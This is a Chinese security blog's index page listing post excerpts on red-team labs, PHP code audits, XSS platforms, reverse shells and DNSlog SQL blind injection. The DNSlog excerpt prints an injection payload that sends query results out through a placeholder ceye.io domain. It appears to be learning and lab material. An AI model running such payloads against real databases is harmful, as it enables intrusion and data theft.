会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
7
8
下一页
2020年6月7日
ATT&CK实战系列——红队实战(二)
摘要: 一、环境搭建 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ DC IP:10.10.10.10OS:Windows 2012应用:AD域 WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去) IP1
阅读全文
posted @ 2020-06-07 11:17 beiwo
阅读(4505)
评论(2)
推荐(1)
2020年5月8日
ajax数据爬取及selenium添加cookie免登录
摘要: 写爬虫的时候遇到 ajax 动态网页,花了一天时间研究了一下(话说这个小工具写了一阵了,我打算做为这学期的课程设计提交,等拿到学分了再开源) 一、ajax技术 ajax 是指一种创建交互式、快速动态网页应用的网页开发技术,通过在后台与服务器进行少量数据交换,ajax 可以使网页实现异步更新。这意味着
阅读全文
posted @ 2020-05-08 16:40 beiwo
阅读(864)
评论(0)
推荐(0)
2020年4月30日
[php代码审计]熊海cms v1.0
摘要: 一、环境搭建 熊海cms v1.0源码 windows 7 phpstudy2016(php 5.4.45) seay源代码审计系统 注意搭建环境时将路径中的中文改成英文 二、漏洞列表 seay 报出 34 个可能的漏洞,不是很多可以再结合容易出漏洞的功能点逐一看一下 2.1文件包含 先检查第一个可
阅读全文
posted @ 2020-04-30 21:51 beiwo
阅读(1379)
评论(0)
推荐(0)
2020年4月23日
[php代码审计]bluecms v1.6 sp1
摘要: 一、环境搭建 bluecms v1.6 sp1源码 windows 7 phpstudy2016(php 5.4.45) seay源代码审计系统 源码在网上很容易下载,很多教程说访问地址 http://localhost/bluecms_v1.6_sp1/uploads/install/ 就会进入到
阅读全文
posted @ 2020-04-23 21:24 beiwo
阅读(4740)
评论(0)
推荐(0)
2020年4月19日
php代码审计基础
摘要: 挺久前看了半本代码审计,但是现在翻来都忘得差不多了。因为最近想开始一些cms的代码审计实战,就过了一遍安全牛的php代码审计视频,下面是笔记啦 一、思路和流程 通读原文:公共函数文件、安全过滤文件、配置文件、index文件 敏感关键字回溯参数 查找可控变量 功能点定向审计:程序安装、文件上传、文件管
阅读全文
posted @ 2020-04-19 15:24 beiwo
阅读(449)
评论(0)
推荐(0)
2020年4月12日
利用dnslog进行sql盲注
摘要: 一、原理 攻击者向 mysql 数据库提交注入语句 ?id=1' and if((select load_file(concat('\\\\',(攻击代码),'.xxxxxx.ceye.io\\abc'))),1,0)--+ if(x,1,0) 如果x为真,则输出1,假则输出0 load_file(
阅读全文
posted @ 2020-04-12 10:19 beiwo
阅读(1106)
评论(0)
推荐(0)
2020年4月8日
搭建个人xss平台
摘要: 想记录一下是因为这个原版的安装配置是 nginx 搭建在 linux 服务器上,而我更习惯用 apache 搭建在物理机上。所以先在网上浏览了一下其他 xss 平台的搭建过程,自己总结、摸索之后成功搭建:) 环境是 win10,phpstudy,xss平台搭在物理机上,通过内网穿透从外网访问。xss
阅读全文
posted @ 2020-04-08 22:09 beiwo
阅读(7186)
评论(0)
推荐(0)
2020年4月7日
python3.7项目打包为一个exe
摘要: 范同学昨晚发了我一个桌面宠物,是每次随机生成的,也有源码,自己改成了固定生成皮卡丘的,在重新编译 py 文件的时候遇到很多问题,记录一下(什么都比写作业好玩嘻嘻嘻) 1.安装 pyinstaller,在 https://github.com/pyinstaller/pyinstaller 下载dev
阅读全文
posted @ 2020-04-07 13:16 beiwo
阅读(945)
评论(0)
推荐(0)
2020年4月4日
通过内网穿透反弹shell
摘要: ngrok 的使用方法在我这篇博客的3.3小节记录过 https://www.cnblogs.com/wkzb/p/12358076.html#autoid-3-2-0 这篇文章的使用情景是攻击机在内网中,而靶机有公网ip(换句话说就是 kali 可以 ping 通靶机,靶机无法 ping 通 ka
阅读全文
posted @ 2020-04-04 15:35 beiwo
阅读(804)
评论(0)
推荐(0)
2020年3月31日
PHP SECURITY CALENDAR 2017 (Day 13 - 16)
摘要: Day 13 - Turkey Baster(特定场合下addslashes函数的绕过) 源码是这样的 1 class LoginManager { 2 private $em; 3 private $user; 4 private $password; 5 6 public function __
阅读全文
posted @ 2020-03-31 22:00 beiwo
阅读(342)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
8
下一页
公告